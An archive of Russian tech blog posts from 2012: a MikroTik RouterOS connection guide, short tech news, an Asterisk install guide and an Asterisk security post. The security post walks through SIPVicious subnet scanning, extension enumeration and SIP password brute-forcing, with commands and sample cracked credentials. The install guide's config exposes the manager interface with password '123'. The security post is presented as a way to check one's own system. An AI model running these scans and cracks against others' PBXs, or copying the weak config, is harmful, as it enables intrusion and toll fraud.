суббота, 28 января 2012 г.

Первое подключение к MikroTik RouterOS

К MikroTik routeros можно подключиться разными способами:
  1. Webfig – Веб интерфейс для конфигурации MikroTik routeros
  2. SSH клиент – программа клиент использующая SSH протокол
  3. Winbox – графическая утилита, для конфигурации MikroTik routeros
По умолчанию IP адрес устройств MikroTik RouterBoard 192.168.88.1, логин admin без пароля. Для конфигурации MikroTik routeros, удобно использовать Winbox, поэтому в данном руководстве, в качестве, основного интерфейса настройки был выбран Winbox.
Для доступа к интерфейсу webfig, введем в браузере ip адрес устройства MikroTik RouterBoard.
 
Рис1. Главная веб страница устройства MikroTik RouterBoard.

Для доступа к webfig, выберем иконку с одноименным названием.
 
Рис2. Аутентификация в webfig

В появившейся форме, вводим логин admin, без пароля.
 
Рис3. MikroTik routeros интерфейс webfig

После авторизации в системе, перед нами раскроется конфигурационный интерфейс webfig. Позже мы рассмотрим как сгруппированы, инструменты в MikroTik routeros.
 
Рис4. SSH клиент putty

Для доступа к устройствам MikroTik RouterBoard по SSH протоколу, в данном руководстве использовался ssh клиент putty. Чтобы подключиться, введите в поле Host Name (or IP address), ip адрес MikroTik RouterBoard. Порт подключения, по умолчанию 22, поэтому поле порт оставим без изменений.
Рис5. Putty Security Alert

Вокне Putty Security Alert, выбираемда.
 
Рис6. MikroTik RouterBoard консоль.

После авторизации в MikroTik routeros, будет доступна консоль, для ввода команд. Как работать в консоли MikroTik routeros, мы рассмотрим позже. А сейчас перейдем к Winbox.
Утилиту Winbox, можно скачать с веб страницы, устройства MikroTik RouterBoard, ip адрес по умолчанию 192.168.88.1. Или с официального сайта mikrotik.com, в разделе downloads.
Рис7. MikroTik routeros Winbox.

В Winbox, на данном этапе нас интересуют три поля:
  1. Connect To – поле для ввода ip или mac адреса устройства, MikroTik RouterBoard, к которому будет выполнено подключение.
  2. Login – поле для ввода логина администратора устройства, MikroTik RouterBoard.
  3. Password - поле для ввода пароля администратора устройства, MikroTik RouterBoard.
Рис8. Поиск устройств MikroTik RouterBoard.

Рядом с полем Connect To, расположена кнопка с изображением трех точек. При нажатии этой кнопки, Winbox выполнит поиск доступных устройств MikroTik RouterBoard. На рисунке 8, видно что было найдено одно устройство MikroTik RouterBoard. Кроме того можно увидеть информацию об устройстве, мас адрес, ip адрес, идентификатор, версию MikroTik routeros и тип устройства MikroTik RouterBoard. К MikroTik RouterBoard, можно подключиться по мас или по ip адресу. Это будет завысить от того, что введено в поле Connect To.
Рис9. MikroTik RouterBoard подключение по mac адресу.
Рис10. MikroTik RouterBoard подключение по ip адресу.
Рис11. MikroTik routeros, рабочее окно Winbox

Окно Winbox, разделено на три части:
  1. Верхняя часть, отображает данные о текущем устройстве MikroTik RouterBoard. Кнопка Safe Mode с элементами отмены или возврата действий, с которыми мы разберемся позже. На верхней панели справа, Hide Password, скрывает или отображает пароли, в зависимости от того, включена функция или нет. Информация о трафике, иконка замка указывает на то что данная сессия, работает в защищенном режиме. Об этом тоже будет сказано ниже. Кликнув правой кнопкой мыши на верхней панели, можно добавить информацию о текущей загрузке процессора, оперативной памяти и времени работы устройства MikroTik RouterBoard.
  2. Левая часть, содержит меню разделов, для конфигурации MikroTik routeros.
  3. Самая большая часть окна Winbox, предназначена для отображения, окон разделов, которые мы будем выбирать для конфигурации.

пятница, 27 января 2012 г.

В Google Earth 6.2 исчезли швы на карте

В новой версии Google Earth начали использовать доработанный алгоритм склеивания фотографий, и теперь даже в том случае если снимки были сделаны разными спутниками/самолетами, в разное время года и при разной погоде, они все равно будут выглядеть на карте более однородно чем раньше.



Нам нужен еще один адаптер


четверг, 26 января 2012 г.

HP: открытая версия webOS в сентябре, фреймворк Enyo 2.0 — уже сейчас

В ноябре прошлого года судьба webOS, проекта, в который HP вложила $1,2 млрд, была под большим вопросом. Но месяц спустя компания все-таки определилась и присвоила этой платформе статус проекта с открытым исходным кодом. Теперь же стали появляться первые результаты данного решения.



В частности, HP пообещала, что полностью открытый вариант операционной системы, названный Open webOS 1.0, будет доступен всем желающим в сентябре этого года, о чем она сообщила на официальном сайте. А разработчикам компания предоставила фреймворк Enyo второго поколения. Этот инструмент позволит создавать webOS-приложения для планшетов, смартфонов и настольных веб-браузеров. Как и оригинальный фреймворк, Enyo 2.0 поддерживает WebKit, плюс он получил совместимость с такими современными веб-браузерами как Firefox, Chrome и Safari.

Кроме того, HP объявила о том, что webOS будет использовать стандартное ядро Linux. Это облегчит производителям устройств переход на новую платформу, если они никогда не имели дел с webOS, но при этом знакомы с Android и другими платформами на базе Linux. Фреймворк Enyo 2.0 доступен уже сейчас на официальном сайте.

Это ж надо такое учудить

http://storage5.static.itmages.ru/i/12/0125/h_1327500396_8818611_b71a9f47f0.jpeg
http://storage6.static.itmages.ru/i/12/0125/h_1327500460_1997379_3e48d1747b.jpeg

вторник, 24 января 2012 г.

Ставим сервер Asterisk на Ubuntu

Заметьте, для целей самого Asterisk и Asterisk GUI LAMP сервер не нужен, у Asterisk’а есть свой.

1. Установим сам asterisk, дополнительные звуковые файлы и поддержку mp3-файлов:
sudo apt-get install asterisk asterisk-sounds-extra asterisk-mp3
В процессе установки отвечаем на единственный вопрос о коде страны, в которой находимся – 7 (Россия).2. Далее ставим GUI
а) Поставим предварительные пакеты:
sudo apt-get install build-essential subversion
б) Копируем исходники с сайта Digium
svn co http://svn.digium.com/svn/asterisk-gui/branches/2.0/ asterisk-gui
в) Ждем, пока пробежит список файлов и переходим в папку с исходниками
cd asterisk-gui
г) Конфигурируем
sudo ./configure
д) Собираем и ставим
sudo make
sudo make install
е) Так как установка была от пользователя root, изменим владельца и группу папки, в которую была установка
sudo chown asterisk -R /var/lib/asterisk/
sudo chgrp asterisk -R /var/lib/asterisk/
ж) Настраиваем файлы конфигурации
!ВАЖНО!
1. В пакете Ubuntu идет файл http.conf со знаком ‘+’ в начале файла. Из-за него не стартует встроенный сервер Астериска. Плюсик надо убрать (а лучше вообще стереть все лишнее и оставить только нужное).
2. Кроме этого, в файле manager.conf есть включение внешнего файла, из-за которого подключение менеджера тоже не стартует. Это еще один аргумент в пользу того, что лучше удалить из файлов все лишнее и оставить только нужное.
sudo nano /etc/asterisk/http.conf
Редактируем:
[general]
enabled=yes
enablestatic=yes
bindaddr=0.0.0.0
bindport=8088
prefix=asterisk
Для доступа к GUI укажем пользователя admin с паролем 123 (в реальности пароль лучше указать серьезный)
sudo nano /etc/asterisk/manager.conf
Редактируем:
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0
webenabled = yes
[admin]
secret = 123
read = system,call,log,verbose,command,agent,user,config
write = system,call,log,verbose,command,agent,user,config
з) Создаем символьную ссылку (т.к. папка /usr/share/asterisk/static-http у меня уже присутствовала, то сначала ее удаляем), парсер меняет сочетания буковок r m – r f, это надо учесть
sudo эрэм эрэф /usr/share/asterisk/static-http
sudo ln -s /var/lib/asterisk/static-http/ /usr/share/asterisk/
и) Проверим установку
sudo make checkconfig
к) Перезапускаем Asterisk
sudo /etc/init.d/asterisk stop
sudo /etc/init.d/asterisk start
л) GUI должен быть доступен по адресу машины, на которой он установлен:
http://IP:8088/asterisk/static/config/index.html

воскресенье, 22 января 2012 г.

Безопастность Asterisk

Не буду рассказывать, как вы должны защищаться от хацкеров, просто посмотрим как можно проверить свой asterisk на дыры.


Итак есть чудный набор скриптов для этих экспериментов. Называется SIPVicious.


Для того чтобы найти уязвимые акки используются утилиты из пакета SIPVicious: каждая из них работает в консоли и может запускать как под виндой, так и линухом.

Для этого сначала просканируем заданную подсеть (скажем, это будет 192.168.1.1/24), чтобы найти BPX:

./svmap 192.168.1.1/24
| SIP Device | User Agent |
-------------------------------------
| 192.168.1.103:5060 | Asterisk PBX |



Таким образом, мы нашли нашу АТС-ку. Далее необходимо провести ее анализ и отыскать extention’s:

./svwar.py 192.168.1.103
| Extension | Authentication |
------------------------------
| 123 | reqauth |
| 100 | reqauth |
| 101 | noauth |





И хотя результат для нас вряд ли можно назвать неожиданным, мы видим, что номер 101 не требует авторизации. А для 100 и 123 требуется ввести пароль.

Попробуем подобрать его для 100, используя подбор по числовым значениям (а они используются более чем часто):

./svcrack.py 192.168.1.103 -u 100
| Extension | Password |
------------------------
| 100 | 100 |
  

Пароль подобран! Теперь попробуем взломать пасс для аккаунта 123, используя словарик:

 ./svcrack.py 192.168.1.103 -u 123 -d dictionary.txt
| Extension | Password |
------------------------
| 123 | secret |



Пассы найдены: осталось подставить найденные логин-пароль в свой SIP клиент и проверить их в действии. Конечно, вероятность успешного брутфорса на отдельно взятый аккаунт невелика. Но среди сотен extentionов всегда найдется хотя бы один со слабым паролем. Более того, подход “обнаружить bpx, найти extention, подобрать пароль” является одной из самых простых на VoIP.
Никоим образом не несу ответственности за чьи то взломанные PBX. Пост написан для проверки себя на дыры и в ознакомительных целях. Всем удачной защиты)